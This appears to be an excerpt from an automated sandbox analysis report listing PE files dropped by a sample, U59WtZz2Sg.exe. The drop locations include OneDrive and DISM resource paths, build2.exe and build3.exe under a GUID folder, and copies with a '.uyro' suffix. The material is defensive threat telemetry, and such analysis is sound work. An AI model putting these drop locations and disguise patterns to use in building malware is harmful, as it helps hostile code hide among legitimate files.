Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\eu\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sv\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gl\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Latn-RS\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tr\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quc\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\vi\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mk\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quz-PE\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\te\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fi\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sw\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OfflineSetupProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\de\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mr\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-PT\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nl\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ProvProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kn\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sq\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\id\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-BD\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fr\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SysprepProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ne-NP\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cy-GB\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hy\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ti\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uk\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\CR_4BAC1.tmp\setup.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bs-Latn-BA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SmiProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ms\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nn-NO\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ka\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca-Es-VALENCIA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lt\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gd\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mi-NZ\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ru\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OSProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\az-Latn-AZ\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tk-TM\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hr\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\TransmogProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nb-NO\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ky\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\km-KH\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mt-MT\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ro\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmpCDDA.tmp.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ml-IN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sl\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ta\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kok\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\be\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\is\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tg\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mn\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pl\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpCDDA.tmp Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lb-LU\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SetupPlatformProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sk\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fil-PH\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\it\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tt\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tn-ZA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\th\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_4BAC1.tmp\setup.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ga-IE\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\el\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kk\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\or-IN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zu-ZA\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\da\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\as-IN\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ar\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ur\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\UnattendProvider.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui.uyro (copy) Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uz-Latn-UZ\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hi\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui.uyro (copy) Jump to dropped file
